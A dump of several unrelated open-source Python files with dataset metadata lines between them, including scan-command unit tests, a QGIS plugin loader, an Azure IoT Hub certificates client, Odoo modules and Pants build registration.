self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
# .. as list
cmds = Comment("One"), Comment("Two")
cmd = Parallel(cmds)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
cmd = Parallel(body=cmds)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
# With other parameters
cmd = Parallel(cmds, timeout=10)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><timeout>10</timeout><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
cmd = Parallel(cmds, errhandler="MyHandler")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body><error_handler>MyHandler</error_handler></parallel>")
cmd = Parallel()
cmd.append(Comment("One"), Comment("Two"))
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<parallel><body><comment><text>One</text></comment><comment><text>Two</text></comment></body></parallel>")
def testLog(self):
# One device
cmd = Log("pv1")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device></devices></log>")
# Nothing
cmd = Log()
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log />")
# Several
cmd = Log("pv1", "pv2", "pv3")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device><device>pv2</device><device>pv3</device></devices></log>")
# .. provided as list
devices_to_log = [ "pv1", "pv2", "pv3" ]
cmd = Log(devices_to_log)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<log><devices><device>pv1</device><device>pv2</device><device>pv3</device></devices></log>")
def testInclude(self):
cmd = Include("start.scn")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<include><scan_file>start.scn</scan_file></include>")
cmd = Include("start.scn", "macro=value")
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<include><scan_file>start.scn</scan_file><macros>macro=value</macros></include>")
def testScript(self):
cmd = Script("MyCustomScript")
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomScript')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomScript</path></script>")
cmd = Script("MyCustomCommand", "arg1", 42.3)
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomCommand', 'arg1', 42.3)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomCommand</path><arguments><argument>arg1</argument><argument>42.3</argument></arguments></script>")
# Arguments already provided as list
cmd = Script("MyCustomCommand", [ "arg1", 42.3 ])
print(cmd)
self.assertEqual(str(cmd), "Script('MyCustomCommand', 'arg1', 42.3)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<script><path>MyCustomCommand</path><arguments><argument>arg1</argument><argument>42.3</argument></arguments></script>")
def testWait(self):
cmd = Wait('device', 3.14)
print(cmd)
self.assertEqual(str(cmd), "Wait('device', 3.14)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<wait><device>device</device><value>3.14</value><comparison>EQUALS</comparison></wait>")
cmd = Wait('counts', 1000, comparison='increase by', timeout=5.0, errhandler='someHandler')
print(cmd)
self.assertEqual(str(cmd), "Wait('counts', 1000, comparison='increase by', timeout=5, errhandler='someHandler')")
self.assertEqual(ET.tostring(cmd.genXML()), b"<wait><device>counts</device><value>1000</value><comparison>INCREASE_BY</comparison><timeout>5.0</timeout><error_handler>someHandler</error_handler></wait>")
def testIf(self):
cmd = If('device', '>', 3.14)
print(cmd)
self.assertEqual(str(cmd), "If('device', '>', 3.14, tolerance=0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<if><device>device</device><comparison>ABOVE</comparison><value>3.14</value><tolerance>0.1</tolerance><body /></if>")
cmd = If('device', '>', 3.14, [ Comment('BODY') ])
print(cmd)
self.assertEqual(str(cmd), "If('device', '>', 3.14, [ Comment('BODY') ], tolerance=0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<if><device>device</device><comparison>ABOVE</comparison><value>3.14</value><tolerance>0.1</tolerance><body><comment><text>BODY</text></comment></body></if>")
def testLoop(self):
cmd = Loop('pv1', 1, 10, 0.1)
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>false</wait><body /></loop>")
cmd = Loop('pv1', 1, 10, 0.1, Delay(5))
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(5) ])")
cmd = Loop('pv1', 1, 10, 0.1, Delay(1), Delay(2))
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(1), Delay(2) ])")
cmd = Loop('pv1', 1, 10, 0.1, body= [ Delay(1), Delay(2) ])
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, [ Delay(1), Delay(2) ])")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>false</wait><body><delay><seconds>1</seconds></delay><delay><seconds>2</seconds></delay></body></loop>")
cmd = Loop('pv1', 1, 10, 0.1, Delay(1), Delay(2), readback=True)
print(cmd)
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><wait>true</wait><readback>pv1</readback><tolerance>0.01</tolerance><body><delay><seconds>1</seconds></delay><delay><seconds>2</seconds></delay></body></loop>")
cmd = Loop('pv1', 1, 10, 0.1, completion=True, timeout=10)
print(cmd)
self.assertEqual(str(cmd), "Loop('pv1', 1, 10, 0.1, completion=True, timeout=10)")
self.assertEqual(ET.tostring(cmd.genXML()), b"<loop><device>pv1</device><start>1</start><end>10</end><step>0.1</step><completion>true</completion><wait>false</wait><timeout>10</timeout><body /></loop>")
def testXMLSequence(self):
cmds = CommandSequence()
print(cmds)
self.assertEqual(len(cmds), 0)
print(cmds.genSCN())
cmds = CommandSequence(Comment('One'))
print(cmds)
self.assertEqual(len(cmds), 1)
print(cmds.genSCN())
cmds = CommandSequence(Comment('One'), Comment('Two'))
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
self.assertEqual(b"<commands><comment><text>One</text></comment><comment><text>Two</text></comment></commands>",
cmds.genSCN().replace(b"\n", b"").replace(b" ", b""))
cmds = CommandSequence(Comment('One'))
cmds.append(Comment('Two'))
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
cmds = CommandSequence( ( Comment('One'), Comment('Two') ) )
print(cmds)
self.assertEqual(len(cmds), 2)
print(cmds.genSCN())
cmds = CommandSequence(Comment('Example'), Loop('pos', 1, 5, 0.5, Set('run', 1), Delay(2), Set('run', 0)))
print(cmds)
def testCommandSequenceFormat(self):
cmds = CommandSequence(Parallel(
Sequence(Comment('Chain1'), Set('run', 1), Delay(2), Set('run', 0)),
Sequence(Comment('Chain2'), Set('foo', 1), Delay(2), Set('foo', 0))
))
print(cmds)
self.assertEqual(str(cmds), "[\n Parallel(\n Sequence(\n Comment('Chain1'),\n Set('run', 1),\n Delay(2),\n Set('run', 0)\n ),\n Sequence(\n Comment('Chain2'),\n Set('foo', 1),\n Delay(2),\n Set('foo', 0)\n )\n )\n]")
def testCommandAbstractMethodsMustBeImplemented(self):
class IncompleteCommand(Command):
pass
self.assertRaises(TypeError, IncompleteCommand)
if __name__ == "__main__":
unittest.main()
| epl-1.0 | -2,978,407,120,462,472,700 | 460,669,125,174,622,900 | 50.670139 | 346 | 0.608628 | false |
GHsimone/LCCS3basicCoder | __init__.py | 1 | 1622 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
LCCS3_BasicCoder
A QGIS plugin
The plugin loads a LCCS3 legend, creates a form with all LCCS3 classes and allows the user to code selected polygons
-------------------
begin : 2015-04-16
copyright : (C) 2015 by Simone Maffei
email : [email protected]
git sha : $Format:%H$
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
This script initializes the plugin, making it known to QGIS.
"""
# noinspection PyPep8Naming
def classFactory(iface): # pylint: disable=invalid-name
"""Load LCCS3_BasicCoder class from file LCCS3_BasicCoder.
:param iface: A QGIS interface instance.
:type iface: QgsInterface
"""
#
from .lccs3_basiccoder import LCCS3_BasicCoder
return LCCS3_BasicCoder(iface)
| gpl-2.0 | -6,126,340,916,275,074,000 | 7,600,087,600,670,462,000 | 45.342857 | 117 | 0.422318 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-iothub/azure/mgmt/iothub/operations/certificates_operations.py | 2 | 23304 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class CertificatesOperations(object):
"""CertificatesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: The version of the API. Constant value: "2017-07-01".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-07-01"
self.config = config
def list_by_iot_hub(
self, resource_group_name, resource_name, custom_headers=None, raw=False, **operation_config):
"""Get the certificate list.
Returns the list of certificates.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateListDescription
<azure.mgmt.iothub.models.CertificateListDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateListDescription
<azure.mgmt.iothub.models.CertificateListDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateListDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get(
self, resource_group_name, resource_name, certificate_name, custom_headers=None, raw=False, **operation_config):
"""Get the certificate.
Returns the certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, resource_name, certificate_name, if_match=None, certificate=None, custom_headers=None, raw=False, **operation_config):
"""Upload the certificate to the IoT hub.
Adds new or replaces existing certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate. Do not specify for creating
a brand new certificate. Required to update an existing certificate.
:type if_match: str
:param certificate: base-64 representation of the X509 leaf
certificate .cer file or just .pem file content.
:type certificate: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
certificate_description = models.CertificateBodyDescription(certificate=certificate)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_description, 'CertificateBodyDescription')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201, 200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('CertificateDescription', response)
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete(
self, resource_group_name, resource_name, certificate_name, if_match, custom_headers=None, raw=False, **operation_config):
"""Delete an X509 certificate.
Deletes an existing X509 certificate or does nothing if it does not
exist.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200, 204]:
raise models.ErrorDetailsException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def generate_verification_code(
self, resource_group_name, resource_name, certificate_name, if_match, custom_headers=None, raw=False, **operation_config):
"""Generate verification code for proof of possession flow.
Generates verification code for proof of possession flow. The
verification code will be used to generate a leaf certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateWithNonceDescription
<azure.mgmt.iothub.models.CertificateWithNonceDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateWithNonceDescription
<azure.mgmt.iothub.models.CertificateWithNonceDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}/generateVerificationCode'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateWithNonceDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def verify(
self, resource_group_name, resource_name, certificate_name, if_match, certificate=None, custom_headers=None, raw=False, **operation_config):
"""Verify certificate's private key possession.
Verifies the certificate's private key possession by providing the leaf
cert issued by the verifying pre uploaded certificate.
:param resource_group_name: The name of the resource group that
contains the IoT hub.
:type resource_group_name: str
:param resource_name: The name of the IoT hub.
:type resource_name: str
:param certificate_name: The name of the certificate
:type certificate_name: str
:param if_match: ETag of the Certificate.
:type if_match: str
:param certificate: base-64 representation of X509 certificate .cer
file or just .pem file content.
:type certificate: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`CertificateDescription
<azure.mgmt.iothub.models.CertificateDescription>` or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises:
:class:`ErrorDetailsException<azure.mgmt.iothub.models.ErrorDetailsException>`
"""
certificate_verification_body = models.CertificateVerificationDescription(certificate=certificate)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/IotHubs/{resourceName}/certificates/{certificateName}/verify'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'certificateName': self._serialize.url("certificate_name", certificate_name, 'str', pattern=r'^[A-Za-z0-9-._]{1,64}$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_verification_body, 'CertificateVerificationDescription')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.ErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateDescription', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| mit | -6,905,391,675,838,449,000 | -4,680,857,237,659,994,000 | 47.55 | 189 | 0.663749 | false |
sergio-incaser/odoo | addons/point_of_sale/report/__init__.py | 381 | 1238 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pos_users_product
import account_statement
import pos_receipt
import pos_invoice
import pos_lines
import pos_details
import pos_payment_report
import pos_report
import pos_order_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,231,633,003,561,193,500 | 5,636,196,344,254,077,000 | 37.6875 | 78 | 0.647011 | false |
odootr/odoo | addons/hr_recruitment/wizard/hr_recruitment_create_partner_job.py | 337 | 3434 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_recruitment_partner_create(osv.osv_memory):
_name = 'hr.recruitment.partner.create'
_description = 'Create Partner from job application'
_columns = {
'close': fields.boolean('Close job request'),
}
def view_init(self, cr, uid, fields_list, context=None):
case_obj = self.pool.get('hr.applicant')
if context is None:
context = {}
for case in case_obj.browse(cr, uid, context['active_ids'], context=context):
if case.partner_id:
raise osv.except_osv(_('Error!'),
_('A contact is already defined on this job request.'))
pass
def make_order(self, cr, uid, ids, context=None):
mod_obj = self.pool.get('ir.model.data')
partner_obj = self.pool.get('res.partner')
case_obj = self.pool.get('hr.applicant')
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
result = mod_obj._get_id(cr, uid, 'base', 'view_res_partner_filter')
res = mod_obj.read(cr, uid, result, ['res_id'], context=context)
for case in case_obj.browse(cr, uid, context['active_ids'], context=context):
partner_id = partner_obj.search(cr, uid, [('name', '=', case.partner_name or case.name)], context=context)
if partner_id:
raise osv.except_osv(_('Error!'),_('A contact is already existing with the same name.'))
partner_id = partner_obj.create(cr, uid, {
'name': case.partner_name or case.name,
'user_id': case.user_id.id,
'comment': case.description,
'phone': case.partner_phone,
'mobile': case.partner_mobile,
'email': case.email_from
}, context=context)
case_obj.write(cr, uid, [case.id], {
'partner_id': partner_id,
}, context=context)
return {
'domain': "[]",
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'res.partner',
'res_id': int(partner_id),
'view_id': False,
'type': 'ir.actions.act_window',
'search_view_id': res['res_id']
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,766,379,065,062,157,300 | -1,239,823,438,012,204,000 | 40.878049 | 118 | 0.5629 | false |
slyphon/pants | src/python/pants/backend/python/register.py | 5 | 2297 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.core.targets.dependencies import Dependencies
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.python_requirement import PythonRequirement
from pants.backend.python.python_requirements import python_requirements
from pants.backend.python.targets.python_binary import PythonBinary
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.backend.python.tasks.pytest_run import PytestRun
from pants.backend.python.tasks.python_binary_create import PythonBinaryCreate
from pants.backend.python.tasks.python_repl import PythonRepl
from pants.backend.python.tasks.python_run import PythonRun
from pants.backend.python.tasks.setup_py import SetupPy
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.goal.task_registrar import TaskRegistrar as task
def build_file_aliases():
return BuildFileAliases(
targets={
'python_binary': PythonBinary,
'python_library': PythonLibrary,
'python_requirement_library': PythonRequirementLibrary,
'python_test_suite': Dependencies, # Legacy alias.
'python_tests': PythonTests,
},
objects={
'python_requirement': PythonRequirement,
'python_artifact': PythonArtifact,
'setup_py': PythonArtifact,
},
context_aware_object_factories={
'python_requirements': BuildFileAliases.curry_context(python_requirements),
}
)
def register_goals():
task(name='python-binary-create', action=PythonBinaryCreate).install('binary')
task(name='pytest', action=PytestRun).install('test')
task(name='py', action=PythonRun).install('run')
task(name='py', action=PythonRepl).install('repl')
task(name='setup-py', action=SetupPy).install().with_description(
'Build setup.py-based Python projects from python_library targets.')
| apache-2.0 | 8,384,845,458,574,367,000 | 3,039,393,126,418,606,600 | 44.039216 | 93 | 0.772312 | false |
thinkopensolutions/geraldo | site/newsite/django_1_0/tests/regressiontests/humanize/tests.py | 19 | 3125 | import unittest
from datetime import timedelta, date
from django.template import Template, Context, add_to_builtins
from django.utils.dateformat import DateFormat
